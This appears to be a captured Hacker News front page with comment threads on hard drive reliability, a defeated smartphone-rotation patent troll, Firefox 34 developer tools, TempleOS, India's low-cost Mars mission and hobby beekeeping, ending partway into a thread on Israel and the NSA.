I love reading these posts from Backblaze, but what I never understand is that they are getting a cost of U$ ~0.05/GB with their storage pods:


At these rates, why not use S3? What am I missing?

makmanalp 2 days ago 1 reply      
Anyone have any reliability information on hitachi's new NAS drive series? They're supposed to build on the 7k3000 etc, but specifically tailored for NAS / raid situations, like WD reds. One major difference is that they're 7200 rpm instead of 5400 which is most non-high-end NAS drives.
cake 2 days ago 2 replies      
I wish there was something similar for SSDs.
justcommenting 2 days ago 1 reply      
There are well established methods for time-to-failure and time-to-event data not used here. The author makes no effort to control for the multiple, obvious biases created by the analytical approach employed. A few simple graphs would give a much more telling view of these data.
TheLoneWolfling 2 days ago 0 replies      
I'd be interested to see what a graph of percentage remaining versus time since installation looks like for these. Might give a better picture of what's going on.
shadeless 2 days ago 0 replies      
I recently bought 3TB Western Digital Red, following their advice from [1], but now I see that it has yearly failure rate of 8.8%, bummer.

Off-topic, but It's a shame that BackBlaze isn't available in some countries, I'd love to use it. What would be the best alternative to it, Tarsnap?

[1] https://www.backblaze.com/blog/what-hard-drive-should-i-buy/

BuckRogers 1 day ago 1 reply      
I keep seeing this stuff over the years, so I go buy something other than Seagate like WD... and they fail within a year. So I replace it with a Seagate and no problems for years. See another report that says Seagate is terrible- repeat process.

I'm just going to keep using Seagate until my anecdata refutes the reality I live in.

rancor 2 days ago 0 replies      
Used in a small file server, my net failure rate on Seagate's consumer 3TB drives has been over 50% thus far. The pair of their SAS drives I currently have in use have been fine, although both of them are still below a year of service life...Edit: Just checked my drive status, and yet another one has dropped. If I'm doing my math correctly, that's 75% of the drives that weren't DOA...
cgore 2 days ago 2 replies      
My main Linux box has quite a few hard drives in it from a large range of time. About 4 weeks ago the oldest of them all died: it is from 2007, so about 7 years old, which I think is pretty good for a consumer drive that's on 24/7. It was a Western Digital Caviar SE WD3200JB, 320GB. I replaced it with a 2TB drive.

[No lost data, I do daily backups.]

sauere 2 days ago 1 reply      
Hard drive age a bad parameter to use. It should be the hours the drive was actually powered on.
BradRuderman 2 days ago 1 reply      
Let's get a blog post describing how they handled reimbursements for the drive farming. I imagine it to be incredibly complicated to cross reference a receipt with a product at that scale , especially since all the products were the same.
arb99 2 days ago 1 reply      
Very off topic, but their html is wrong:

"<a href='https://www.backblaze.com/blog/hard-drive-reliability-update... src='https://www.backblaze.com/blog/wp-content/uploads/2014/09/bl... alt='Hard Drive Failure Rates by Model' width='560px' border='0' /></a>"

should be "width='560'" not "width='560px'"

ars 2 days ago 1 reply      
No Toshiba hard disks apparently.

HGST and Wester Digital are the same company, but it seems they have separate product lines? It's confusing.

mercurialshark 2 days ago 1 reply      
All my WD and Seagate drives have failed within two years of use. Call me the luckiest.
robomartin 2 days ago 0 replies      
Thanks for sharing such useful data. I just had a Seagate drive fail. Was able to recover data since the last local backup with various tools. It took hours of repair work.

I've been procrastinating about getting off-site backup. This post on HN reminded me that I've been meaning to get an account going with your company for a while. I just signed up and will test on my machine before deploying to other machines in my business. Thank you.

larrys 2 days ago 2 replies      
Question for the OP here (or for anyone else).

Do you burn in new drives before using? I typically will take any new drive and do some type of stress test [1] on it for 18 to 24 hours to see if it fails with that initial constant use.

[1] Constant reformatting for example writing 0's to the entire disk 7 times etc.

Another Patent Troll Slain. You Are Now Free to Rotate Your Smartphone
383 points by VanL  3 days ago   41 comments top 9
crhulls 3 days ago 6 replies      
Startups can pool together to fight these guys. My company, Life360 got sued after raising $50m. They thought this meant we had money to write checks from, but instead we decided to use it to fight.

We're basically being sued for allowing you to click a marker on a map initiating a phone call.

This obviously should never have been patented, so we are doing all the legal defense work and sharing it with the startup community.

See www.stopagis.com if you want to see how we really pissed off our troll.

And public shaming also works, the CEO of our troll didn't own his domain, so we bought it and drive traffic to the site whenever people search for his name (Malcolm Beyer www.malcolmbeyer.com). They don't like that we "aren't playing by the rules".

r00fus 3 days ago 9 replies      
"Rotatable sued us and immediately asked for $75,000 to go away. We refused. And we fought. Its Rackspace policy to not pay off patent trolls, even if it costs us more to fight. Eventually Rotatable offered to just walk away but we refused again. Just as we promised last year, we challenged the patent and the USPTO invalidated it.

This means that Rackspace will not pay one penny to this troll, nor will Apple, Netflix, Electronic Arts, Target, Whole Foods or any of the other companies sued by Rotatable for how they use screen rotation technology in their apps."

It surprises me why there aren't joint defense funding efforts in place to put these industry pests to bed... Clearly Apple, Google and Microsoft would have been next on Rotatable's target list if Rackspace had caved - and like weeding, rooting them out early will prevent infestations.

Is it because the big corps perhaps view the trolls as worth their pain - what function could they serve?

jmedwards 2 days ago 0 replies      
Rotatable sued us and immediately asked for $75,000 to go away. We refused. And we fought. Its Rackspace policy to not pay off patent trolls, even if it costs us more to fight. Eventually Rotatable offered to just walk away but we refused again. Just as we promised last year, we challenged the patent and the USPTO invalidated it.

This is an excellent strategy and will pay dividends to RackSpace in the long term: what minor patent trolls will touch them now?

ps4fanboy 3 days ago 2 replies      
This has really bought rack space a lot of good will in my mind. Everytime I read an article like this I find myself wanting to do business with them more and more.
luxstyle 3 days ago 2 replies      
Why do trolls still try to sue Rackspace? They publicly proclaim their anti-troll policy. If 88% of these cases kill the troll when they go through the courts fully, I would stay well away from them if I was a patent troll.
shittyanalogy 2 days ago 2 replies      
This is fun and all but calling the patent troll slain is a bit optimistic. Most likely "Rotatable Technologies" was specifically created to sue companies for this patent so they could simply go out of business if things got too rough. The larger patent troll, I'm sure, considers this loss a normal part of doing business and will continue with other patents. This does not get any better simply because one patent was invalidated.

We need legislative change, not to fight fire with fire. Public perception of these companies being trolls and detrimental to innovation is important but this is not a victory. It is simply not a loss and still an enormous waste of resources. We need patent reform.

arbuge 3 days ago 0 replies      
>> We are still fighting some of the trolls that have come after us and we expect to win those cases too. Without changes in the law we believe that the only way to end the plague of patent trolls is by fighting every troll that comes at us and we encourage all others to do the same.

Needless to say, Rackspace can afford this strategy whereas smaller companies, who have no full-time attorneys on staff and little funds to retain outside counsel, generally cannot. A change in the law is needed to legislate patent trolls out of existence is still needed, basically yesterday.

dthunt 3 days ago 1 reply      
I am a strong advocate of the following principle:

Defeat your enemies.

Rackspace deserves some big props, here. More should follow their example.

tempodox 2 days ago 0 replies      
Nice going, and a service to the community. Thanks!
New Developer Tools Features in Firefox 34
363 points by xOnic  3 days ago   65 comments top 21
azinman2 3 days ago 2 replies      
Ok debug logging into a table is probably one of the best improvements to logging I've seen in a long time. I kinda want this in every programming language. There are so many useful things about it, especially the ability to then randomly sort it at will!
bshimmin 3 days ago 3 replies      
The jQuery events inspector looks super useful.

I keep meaning to give Firefox another try - after ditching it for Safari, and then Chrome, some years ago - but I never quite find the motivation.

diafygi 3 days ago 1 reply      
Is the bug that treats re-requests source files when opening the debugger fixed yet?


genericacct 3 days ago 2 replies      
I was excited about the WebIDE but apparently it's only for firefox OS apps. Is there any way of linking a webIDE to devTools? I'd pay for a tool that lets me click on a jsconsole error message and then takes me straight to the editor at that line and column on the original file.
frankzander 3 days ago 0 replies      
What about firebug? Who long will firebug live with sight of the developer tools becomming better and better?
Kiro 3 days ago 2 replies      
Finally a way to easily inspect and delete cookies on the run. I remember getting voted down here for complaining about it previously.

EDIT: Ok, read-only. Too bad but at least they have it planned.

Tloewald 3 days ago 2 replies      
A ton of very compelling stuff. I hope it all works nicely; I have found the Firefox dev tools to be weirdly clunky of late and keep going back to Chrome, but this may drag me back.
allan_s 2 days ago 1 reply      
something that got "broken" for me in recent version of firefox (I think starting with 32) is that doing a console.log of a very long string does not display the whole string anymore

i.e it will print

"a looooooong string [..]" (with the [..])

same if i try to observe the variable in the debugger. And I cant find a way to get the full string in anyway, I understand for a lot things you dont want to print accidentally a 200k characters longs string as it will use a lot of memory for maybe nothing, but in my current use case (getting long xml documents to copy paste them in a beautifier / send to colleague as attachments for bug report etc.) it breaks my workflow (I'm posting here because google does not seems very talkative about this issue)

pdknsk 3 days ago 1 reply      
The only feature in Firefox I miss in Chrome is the view that shows the stacked layers of a website. I dismissed it when I first tried, but it can be surprisingly useful. It's no reason to make me switch to Firefox though.


leeoniya 3 days ago 1 reply      
is there any way of making the inspector show simple textContent inline with the nodes without having to unfold them? i keep going back to Firebug for this.

rather than

    <em>       test    </em>

dubcanada 3 days ago 1 reply      
Does anyone know if there is a way to theme the developer tools? Like you can do in Chrome?

Like https://chrome.google.com/webstore/detail/devtools-theme-zer...

geekam 2 days ago 0 replies      
Finally, the storage manipulation has arrived. Now I can get rid of Firebug completely.
ck2 3 days ago 1 reply      
I'm more excited about this coming in the next version(s)



Back in August they were debating enabling by default in November but it is probably not ready for prime-time yet


gioele 3 days ago 2 replies      
How big are the developer tools compared to the rest of Firefox? 5% of the total size? 10%?

Can't the more sophisticated tools be split into a separate extension, leaving only some basic things in the distributed package?

arenaninja 3 days ago 0 replies      
Sweet, sweet console.table()! I've never been happy with the way that console.log works for objects/arrays, I'm eager to use this one
kolev 3 days ago 0 replies      
This is great! Firefox Aurora has been my main browser for over 6 months and now these great improvements will keep the status quo for me!
iSnow 3 days ago 0 replies      
Oh, this is neat. This is probably the first time the built-in debugging tools make me think about ditching FireBug.
ux-app 3 days ago 0 replies      
great to see the iframe switcher. Was such a pain to manually switch the context between top and child frames.
vvh 3 days ago 0 replies      
good list of tools, thanks!
Gonzih 3 days ago 1 reply      
arahaya 3 days ago 0 replies      
TempleOS: 5 minute random code walkthrough
357 points by GuiA  3 days ago   168 comments top 33
Mithaldu 3 days ago 1 reply      
These videos already make me inordinately happy, because everything about templeos is beautiful, and having it explained is so very nice. However the most beautiful take-away from these videos to me is that Terry has a bird. :)
chippy 3 days ago 3 replies      
I want to build in some kind of primitive networking into this OS - just so one machine can talk to another... it's on my side project list. Anyone had much experience with the code?

Also - Love the positive comments in this thread. Proud of this community.

M4v3R 3 days ago 5 replies      
It makes me sad that even with his illness he delivered more working code than I probably will ever do. Maybe not because I can't, but because I procastinate so much and I really have hard time focusing on doing work.
microcolonel 3 days ago 0 replies      
I had a conversation with Terry on freenode a couple years ago, back when TempleOS was "losethos".

I was convinced, given the context, that losethos was just computer malware, and he had a hard time articulating why it wouldn't be, and ended up just getting frustrated at the most cursory of questions.

A few days later, somebody who had witnessed the conversation informed me that he was a well known probable schizophrenic, and it really bummed me out that I didn't know or handle the situation better.

While he hasn't convinced me of anything other than that having nice uniform names for types can be helpful(U64, S64, F64, etc.), that conversation gave me some perspective on what it means to be schizophrenic.

userbinator 2 days ago 1 reply      
What makes this amazing is that Linus Torvalds probably wouldn't be able to pick a random piece of code in the Linux kernel and do this.

The fact that it's quite featureful for an OS of ~100kLOC - including an assembler and compiler for a language with some OOP - makes this even more interesting. "The shell is a compiler/interpreter" concept somewhat reminds me of Lisp machines too.

Igglyboo 3 days ago 0 replies      
This guy never ceases to amaze me, he's insanely smart and dedicated.
orbifold 2 days ago 1 reply      
One concept I really like is to just identity map the whole address space and run everything with full priviledges. With a sufficiently high level memory safe language with good concurrency and memory regions support, you should be able to statically enforce most of the guarantees that the hardware provides and at the same time get rid of context switches. Untrusted code in a memory unsafe language would simply run in a VM.
andrewljohnson 3 days ago 2 replies      
Random numbers coming from God is cute. I'm not a theist, but I also feel awe of the elusive concept of true randomness. I read something about this from him before, and it pops up in the 1st video.

The flashing Menu button and marquee filename are interesting. A distraction to most people, but I wonder if they help the author Terry stay focused.

sitkack 3 days ago 0 replies      
The world is definitely better off with Terry. Thanks man and keep on doing your thing.
incision 3 days ago 1 reply      
Neat, subscribed.

I make a point to read TempleOS' comments. Looking past the frequent nastiness they're sometimes interesting and even poetic, in a way that's as sadly familiar as the intonation in these videos.

tlo 3 days ago 4 replies      
Can somebody explain in a few words what TempleOS is?
callahad 3 days ago 1 reply      
I love the idea of a built-in hotkey for jumping to a random line across the entire codebase. Like a fuzzer, but for your understanding of your project.

...and now I really want to write a vimscript to do the same.

codezero 3 days ago 0 replies      
I actually like the idea of having to pick a random routine in a large codebase and then explaining it on the fly. Terry does a pretty good job at this, he's done similar things in other videos.
curiousDog 3 days ago 3 replies      
As much as I appreciate what he did (most of us wrote a bare bones OS in school anyway), I'm not a fan of his racist comments. Some are incredibly specific like "I can't believe a nigger is the boss of a white guy, that just isn't right" or something like that. It's like he has these thoughts actually bottled up but cannot control them because of his illness. Nonetheless, my bad to rain on someone with such an illness. All the best to him.
qznc 2 days ago 0 replies      
I like the idea for quick impromptu presentations, so a made a script for git: https://github.com/qznc/dot/blob/master/bin/git-randomline

$ vi $(git randomline)

Then explain to someone in five minutes

LukeB_UK 3 days ago 1 reply      
All the flashing bits and marquees... I never thought that someone could create an OS that reminds me of GeoCities
cmdrfred 3 days ago 2 replies      
I hope medical science can one day find a way to help our friends like Terry find their way home. Until then all we can do is let him know that he is loved and respected by his peers, Terry you are one of us.
broken 2 days ago 1 reply      
"showdead -> yes" is the only reason i have a HN account.
gojomo 3 days ago 1 reply      
What if the giant computing platform battle of 2040 is TempleOS vs. Urbit, because everyone else got neurobricked by the iBrain/mindroid 0day of 2034?
ivans__ 3 days ago 0 replies      
Terry is always a huge inspiration to me!
donatj 2 days ago 0 replies      
A little over a year ago I wrote a post about the problems I saw in Coffeescript, Terry commented that switching to TempleOS would prevent my complaints as I could use his C variant. Made my day to have him comment.
no_future 3 days ago 1 reply      
Terry is a goddamn hero and an inspiration to us all
axaxs 2 days ago 0 replies      
I'd just be happy for a usable Holy C. Growing up in the south, I can perhaps sadly deal with the political or racist rants. Putting that aside, I think the man is a genius who has much to offer the world. I'd love for someone like this to mentor me, though such a thing is hard to find outside academia.
desireco42 2 days ago 0 replies      
After looking at some of videos and intro, he is onto something with this. You can always run this in vm, I can see how permissions and ownership can get in a way. By using subroutines, he gets every ounce of juice out of his machine.Also document format, based on his description, sounds awesome.
smegel 3 days ago 0 replies      
If nothing else, this guy's got staying power.
thaumaturgy 3 days ago 1 reply      
Does anyone have the code for the PRNG handy, or is familiar with it? It'd be kinda neat to see how that bit works.
MarkPNeyer 3 days ago 0 replies      
i've been through a lot of psychosis and feel like i can understand this guy. i had a psychotic break in late 2012 and thought strongly that catholicism was created to teach the world computer science concepts.

when you start reading about roko's basilisk, it's not a stretch at all to imagine that primitive human beings exposed to an artificial intelligence would think of it like 'god'.

namecast 3 days ago 1 reply      
Shine on, Terry, you crazy diamond.

If nothing else, TempleOS is a testament to how much one programmer can accomplish absent feedback or collaboration from others. For better or worse.

Davesjoshin 3 days ago 6 replies      
How come his rants have a lot of racial slurs? Am I missing something? http://www.templeos.org/Wb/Accts/TS/Wb2/Rants/TAD/2014/09/Ra...
elwell 3 days ago 1 reply      
Let's all hope Terry doesn't learn AI enough to equip TempleOS with the ability to learn (as well as networking). There's is no guessing as to what a randomized OS with a god-complex might do.
cmdrfred 3 days ago 2 replies      
What if he's right?
cschep 3 days ago 3 replies      
Whhhaaaaat the hell? Is this real?
One Thing Well A weblog about simple, useful software
365 points by tete  4 days ago   46 comments top 16
Argorak 4 days ago 1 reply      
This tumblr doesn't quite live up its name: http://onethingwell.org/post/97725615916/busybox

BusyBox is great and everything, but it's definitely not subscribing to the "One Thing Well"-philosophy, quite the contrary: everything in one.

asymmetric 4 days ago 1 reply      
OT, but it's heartening to see a link to an RSS feed next to Twitter and G+. I find that more and more sites are abandoning this public, open source standard in favor of proprietary platforms.
state 4 days ago 3 replies      
Sorry, but there is nothing I find more annoying than the "Never miss a post!" spam that Tumblr now inserts in to every page post acquisition.

Perhaps someone could do one thing well and come up with a blogging platform for this nice project?

eps 4 days ago 0 replies      
11 pages of Windows software! Who would've thought it exists :)


tete 4 days ago 0 replies      
Disclaimer: Not my blog, but found it today and really loved it.
fizixer 4 days ago 1 reply      
- See also: suckless.org

- An LFS build off kernel.org (the kernel) and github (the rest of userland) would be an interesting experiment.

juef 4 days ago 0 replies      
denizozger 4 days ago 0 replies      
I love the idea but not the implementation. Categorising software according to purpose and tech stack would be the best.
tretiy3 4 days ago 1 reply      
Very good.Is there any way to subscribe (no count tumblr rss twitter)?
alanning 4 days ago 0 replies      
Short examples would greatly enhance comprehension for me
nXqd 4 days ago 0 replies      
This site could be named unix_hunt :D
zomg 4 days ago 0 replies      
the original "product hunt"! :)
doctorpangloss 4 days ago 3 replies      
> Simple, useful software

I came expecting examples of to-do lists, mail clients, clever messaging apps, etc. There are a handful of those.

Instead, the majority of apps are described by sentences where literally every word would be unfamiliar to a typical computer user. For example, "Cram is a functional testing framework for command line applications based on Mercurials unified test format."

Simple is in the eye of the beholder.

Why India's Mars mission is so cheap and thrilling
386 points by leephillips  1 day ago   161 comments top 17
zizee 1 day ago 9 replies      
Why do people always pass judgment on spending on things they don't agree with as if the money is destroyed. It's not like they pile all the cash onto the rocket and send it to space.

Let's just forget for a moment that valuable skills and infrastructure are being created for India in this process and look at where the money is going.

A large proportion of the expense of this mission goes to paying the wages of domestic scientists and engineers in India. This money will in turn get taxed and spent by the recipients and pumped back into the local economy.

As far as I can see it is a win win win.

someperson 1 day ago 5 replies      
(I posted a similar comment a few months ago.[1] To be clear I have nothing against the India, its space program or its achievements, but it's impossible to discuss the low price of the mission without discussing the elephant in the room)

There is clear lack of sterilization techniques being used on the ISRO spacecraft. This is clearly visible in the public photos and videos. NASA spend a great deal of time and sterilizing deep space probes to reduce the chance of Earth microbes colonizing a place like Mars, or a moon of Jupiter, but ISRO does not.

Watch this video and showing assembly of this particular spacecraft http://www.space.com/23199-indias-first-mars-mission-prepare...

Compare the NASA cleanroom assembling Curiosity - http://www.nasa.gov/centers/jpl/images/content/482654main_pi....

Most engineers at the Indian Space Research Organisation seen directly operating on the spacecraft are not using facial masks or even gloves for interplanetary missions, let alone full cleanroom coveralls. http://www.thehindu.com/multimedia/dynamic/01608/vbk-05-mars... via http://www.thehindu.com/sci-tech/science/indias-october-28-m...)

It would be a huge shame for us to have doubt whether the first extra terrestial microbes we find in the solar system were really alien or simply Space Age Earth based life

It also jibes with this anecdote https://news.ycombinator.com/item?id=6552078

  This comment has nothing to do with India, ISRO, politics or Mars, but I am curious if anyone with expertise can comment on the clean room practices seen applied in this video. Is it odd that the workers don't have on full 'bunny' suits and have (what seems to be) a relatively large amount of skin/hair unprotected? I don't know if it matters that much, it just seems a little lax given the cost of failure.  Firstly, I've visited ISRO Bangalore(A few years back). And I did see the exact things you mentioned. I did ask the guy(Not sure, if he was the PR guy) who took our class for the tour. His answer was, they were likely assembling some test equipment and not the real equipment that was going to space.  (Which unlikely given parent's NYT article:)  The modest budget did not allow for multiple iterations. So, instead of building many models (a qualification model, a flight model and a flight spare), as is the norm for American and European agencies, scientists built the final flight model right from the start.
It's unclear whether the room is a climate and particulate controlled cleanroom up to the standards required for inplanetary probes, but they may (hopefully) do sterilization through chemical and heat treatments - but that alone isn't enough for planetary protection.

[1] https://news.ycombinator.com/item?id=7964261#up_7964499

tn13 1 day ago 0 replies      
In the words of Vikaram Sarabhai, the founding father of ISRO:

    "There are some who question the relevance of space activities in a developing nation. To us, there is no ambiguity of purpose. We do not have the fantasy of competing with the economically advanced nations in the exploration of the moon or the planets or manned space-flight."    "But we are convinced that if we are to play a meaningful role nationally, and in the community of nations, we must be second to none in the application of advanced technologies to the real problems of man and society."

gphilip 15 hours ago 0 replies      
Eight months back, three scientists from ISRO did an AMA on /r/india where they answered a lot of interesting questions and provided good insights into the good, the bad, the hopes and the struggles at ISRO and of being a scientist in India. That AMA will likely answer many of the questions here about ISRO and its operations. For instance:

"All nations wanting to launch to Low Earth Orbits at low costs approach us. Germany, France, Israel, Norway, Denmark, Italy are examples. Yes, despite ESA. Because PSLV is a cost effective and reliable launch vehicle for launching to LEOs."

And of course, Reddit being what it is, there were cute questions and answers as well. Sample:

Qn: "Let's face it. You're definitely "cool" now. Were you "cool" growing up? How was your school/college life in general? Do women dig ISRO scientists?"

Scientist 1: "Oh yes, cool all the way. I don't know about other scientists but they sure dig me."

Scientist 2: "He's kidding. I know for a fact that he is more single than Lance Armstrong's nut."

More here: "We are three ISRO scientists here to answer your questions -AMA" http://www.reddit.com/r/india/comments/1ujcmo/we_are_three_i...

stcredzero 1 day ago 2 replies      
I hope India and China pull off a Mars Direct style mission and beat the US to Mars. The US needs another "Sputnik Moment" to get itself going in space again. I mean for real, not as an esoteric form of federal "pork."
paramendra 1 day ago 3 replies      
The pride in India right now is as if it won the World Cup.
mdemare 16 hours ago 0 replies      
To all those cynics who bitch about the price of this space mission: this mission cost $74M in total. India has a population of 1252M, and a per capita income of $1500.

That means that after paying for this mission to Mars, Indians have still $1499.40 left to spend on other things.

Now stop bitching.

bipin-nag 19 hours ago 1 reply      
There are many point-of-views that one could(should) factor in to explain the circumstances:

1. Mindset due to poverty: There are many people below the poverty line so it makes sense for the scientific programs to aim for the cost-effective solutions not cutting-edge.

2. Experimental: If it was your first space mission, you wouldn't exactly load it with gadgets. Missions have a chance to succeed or to end in failure. Investment would only make sense after tasting some success.

3. Cost of living: If you are well-off in India, you may still be poor outside of India. Cost of living is lowest in India (http://www.numbeo.com/cost-of-living/rankings_by_country.jsp). So cost of research and development will be lower than elsewhere too(maybe not everywhere).

4. Media attention(somewhat): It started with the headlines from British news "We pay for India's rocket to Mars" which raised a lot of eyebrows in India. Even though money from aid was used for intended purpose, it was questioned if India needed the aid. (To me its not worth the brouhaha. They will fancy paying for nuclear programmes next.)

5. GDP: US GDP is the largest in the world. They can afford to spend loads of money without worrying (lets say debt crisis was an exception). India has GDP which is smaller by orders of magnitude.

sid1992 1 day ago 1 reply      
Go to ISRO's website and look at the starting salary for an engineer. Even for the most paid fields there it is not more than 40000 rupees per month or roughly 650 dollars
jgmmo 1 day ago 2 replies      
"They've kept it small. The payload weighs only about 15kg. "

Whoa... So basically that whole mission was for 30ish pounds of actual 'useful equipment' in orbit?

mataug 1 day ago 0 replies      
It feels like they've built a startup, put only the essential things in and build a truly minimum viable product that works and that too quite well.
Rapzid 1 day ago 0 replies      
I believe this could be very good for India on multiple fronts.. But I feel the comparison to NASA's spending is somewhat superficial and borderline disingenuous.
chintan39 19 hours ago 0 replies      
I think its because Indian Organizations know how to utilize their resources efficiently.
idreams 16 hours ago 1 reply      
proud to be an Indian!!
kazinator 1 day ago 15 replies      
How about reliable electricity and water for your people, then Mars.


"Water supply and sanitation in India continue to be inadequate ..."


"Over 300 million (300 million) people in India have no access to electricity. Of those who do, almost all find electricity supply intermittent and unreliable."

peter303 1 day ago 0 replies      
Indian labor is very cheap. Even cheaper in the Motherland.
vithlani 1 day ago 3 replies      
I wish someone would write a headline like:

"Why 750 million Indian citizens cannot enjoy basic sanitation facilities after 60 years of gaining so called independence of their nation"


Loyalty Nearly Killed My Beehive
351 points by dnetesn  3 days ago   108 comments top 24
mudil 3 days ago 2 replies      
I started beekeeping 2 years ago, and I cannot be any happier about this hobby. It's easy and fun. Bees do not require feeding, cleaning, just an occasional check up. And they give my family the best honey the money can buy.

To start, I read (believe it or not) Beeking for Dummies (http://www.amazon.com/Beekeeping-For-Dummies-Howland-Blackis...). It's a well rated book, and it has all the basic info. Then I watched various YouTube videos.

Then I ordered the following list of supplies. (I buy all my equipment from Mann Lake. $100+ it's free shipping. http://mannlakeltd.com/)

This is a list I recommend:

Note that the hive boxes and frames, are unassembled. Mann lake does have assembled hives. Assembly is easy, and I did it with my kids.

1) WW-605_b Med Hive Qty. 52) FR-811 Med Frames Case of 10. Qty. 5 (so you get 50 frames)3) CV-305 Suit - economy - Medium (Buy YOUR size.) Qty. 14) HD-540 Smoker Qty. 15) CL-620 Economy cowhide leather gloves(Buy YOUR size. This is small) Qty. 16) HD-210 7D Nails (1lb) Qty. 17) HD-220 Frame Nails Qty. 18) HD-620 Hive tool9) HD-660 Bee Brush10) WW-310 Bottom Board11) Your choice of top cover (buy with Inner cover)... http://www.mannlakeltd.com/beekeeping-supplies/page29.html I practice foundationless but some prefer not to deal with the cross comb headaches and use foundation. Foundation part number is (FN-720).

I adopted my hive from Jack at Los Altos Honey Bees (http://losaltoshoneybees.wordpress.com/). He goes and rescues feral colonies.

I also joined Beekeepers' Guild Of San Mateo County (http://www.sanmateobeeguild.org/). The club is great: the mailing list discussions keep me informed about things to do right now, and what to do to prepare for upcoming seasons.

radicaledward 3 days ago 3 replies      

Just in case anyone read the first paragraph and thought, "Hey that's a good idea!" Honey contains bacteria that causes infant botulism [1]. Once a child has a more fully developed digestive system, this is no longer a problem.

[1] http://en.wikipedia.org/wiki/Botulism#Infant_botulism

SEJeff 3 days ago 4 replies      
Absolutely fascinating article. I'm really glad that HN contains the occasional non-tech related story. It seems somewhat obvious how an engineering mindset transfers very well to other disciplines, and unbeknownst to me, beekeeping is one of them.
flatline 3 days ago 2 replies      
> Queens typically live for about four or five years

This figure is from an old study that others have repeatedly failed to reproduce. More recent attempts to determine queen longevity have shown they live to an average of about a year, and furthermore failed to find any of significantly advanced age. So it shouldn't too much of a surprise that she only lasted a season. Since there seem to be a few beekeepers hanging out here, I'd be curious to hear anecdotal evidence of queen lifespan.

Qworg 3 days ago 3 replies      
If you like this story, I'd unabashedly recommend that you try and keep bees. They are relatively low maintenance, interesting to observe and fun to debug (no pun intended). Success is amazing - both to eat and think about.

The other benefit is psychological - beekeeping requires an almost zen like approach when dealing with the hive. You cannot get angry or flustered, even when surrounded by thousands of bees desperately trying to sting you. You have to focus, be calm, and do the work.

MechSkep 3 days ago 2 replies      
One of my side projects is building a sensing electronics package to monitor the health and activity of beehives. The idea is to make it easier for someone just starting to maintain their hive.

Any one have feedback on the concept? Or features we haven't thought of?

k_sze 3 days ago 1 reply      
I'm a huge fan of ants, bees, and wasps, but I have never kept bees, only ants. There is something I don't understand.

Is there any rational advantage to keeping the beehive alive between the two queens, especially since the new queen is probably only remotely related in terms of genealogy? Is it just so the production of honey, propolis, etc remains uninterrupted? What happens if you let a beehive completely die and then put in a new queen? Would the beehive become too filthy for the new colony to develop easily?

Or does the author's wish to keep the beehive alive only stem from emotional attachment?

qwerta 3 days ago 1 reply      
I never heard of replacing queens, beehive always raised new one. But perhaps there are different methods in Europe.

I have good story to share: we had 10 beehives at cabin in middle of woods and one of them got stolen! We moved remaining across the town to safer location. Carrying 100 pounds out of which 40 pounds are life bees is quite something :-)

csorrell 3 days ago 2 replies      
This is why I always recommend new beekeepers start out with at least two hives. If the author had another healthy hive, he could have moved a frame of young brood to his queenless hive and they would have raised a new queen on their own.
jackgavigan 3 days ago 1 reply      
There's a whole industry around renting beehives to farmers to pollinate crops: http://www.scientificamerican.com/article/migratory-beekeepi...

There's an interesting supply'n'demand thing going on as a result of the decline in the bee population, coupled with the growth of almonds as a cash crop: http://scientificbeekeeping.com/2012-almond-pollination-upda...

gresrun 3 days ago 0 replies      
My friends are currently serving as missionaries in Tanzania and are teaching the art of beekeeping to help diversify the local economy and diet: http://makondefrasers.wordpress.com/
hiharryhere 3 days ago 0 replies      
Great article, well written and fun. Though how is nobody weirded out by him just leaving his hive on the roof of an apartment he no longer lives in. What a hilarious dude.
S_A_P 3 days ago 1 reply      
So is there any truth to the "africanized/killer"(I dont know any other way to state it but I dont like the term) bees being more difficult to manage and more aggressive? I live in Texas where they arrived in the early 1990s. I would be leery of keeping bees that were not as docile as the european variety. I am not too worried about getting stung once or twice, but I have heard that the "killer" bees go ape shit once the stinging pheromones have been released and you can get stung hundreds of times in a short time span.
Nanzikambe 3 days ago 0 replies      
A beautiful article, makes me yearn for that recent-convert's enthusiasm for a new hobby. Reminds me of when I first took up mycoculture. Perhaps I'll get a behive and join the legion of "that guy" :
beginrescueend 3 days ago 0 replies      
Great article!

We're on our 3rd season beekeeping; we just collected honey, last night.

In fact, I got my first ever bee/wasp/hornet sting ever, last night, from one of our bees. I was being sloppy, wearing running shoes under my bee suit, instead of boots. It hardly hurt at all, though. (I've had worse mosquito bites; so far, horseflies are the worst bites/stings I've ever had).

We captured our first swarm, this year, and got another hive "for free." Woo hoo!

As far as ordering stuff, since somebody mentioned it, we just go to http://www.beekeepers.com/ to get our gear, since our local farm stores don't carry much.

I am interested in these projects, so I can get my bee geek on, but I don't know if I should commit the time and money to them (any success stories out there)? http://www.opensourcebeehives.net/ http://opensourceecology.org/wiki/Beekeeping http://openenergymonitor.org/emon/node/102

mathattack 2 days ago 0 replies      
"Undeterred, I installed the bees on the roof of my Brooklyn apartment and began the absurd process of learning how to keep them alive. Incredibly, they flourished, and by October I had perhaps 70,000 bees..."

That has to make one unpopular with the neighbors.

ncourage 3 days ago 1 reply      
I don't know why I didn't expect this, but this article was the most interesting thing I've read all day. It made me almost feel compassion for the bee hive by my mailbox (if you can call it that), in a hole in the grass. We've tried to be rid of them.
orenjacob 3 days ago 0 replies      
For those interested, Beekeeping For Dummies (http://www.amazon.com/dp/0470430656) is actually quite a good way to start.We've had our queen replaced by our swarm and it was quite an amazing thing to witness.Our hive/swarm gave more than 40 pounds of honey a year and we kept our whole street well fed with local honey for a few years.And my garden almost doubled in productivity once the bees were in place.A win all around.Sadly a family member developed an allergy so we have to discontinue keeping bees, but it was amazing while we had them and I strongly keeping bees to anyone interested.
andyl 3 days ago 0 replies      
I have two hives in the yard. (Palo Alto) We produce 10-20 gallons of honey per year. Fun to harvest - kids love to get hands-on. Fun to give away esp to random strangers.
brianbreslin 3 days ago 2 replies      
My biggest fear of putting a beehive in my parents yard is that it would result in my dog getting stung or my parents.
Elzair 3 days ago 1 reply      
Is Colony Collapse Disorder largely affecting only domesticated beehives?
Thesaurus 3 days ago 0 replies      
I can't believe I read that whole thing, it was written so well. Quite informative and very interesting.
hywel 3 days ago 2 replies      
Kept waiting for this to turn out to be an allegory about a startup.
McDoku 3 days ago 2 replies      
This is so meta.
Israels N.S.A. Scandal
341 points by not_that_noob  2 days ago   128 comments top 12
CamperBob2 2 days ago 3 replies      
Instead of being buried at the end of the article, Bamford's penultimate paragraph

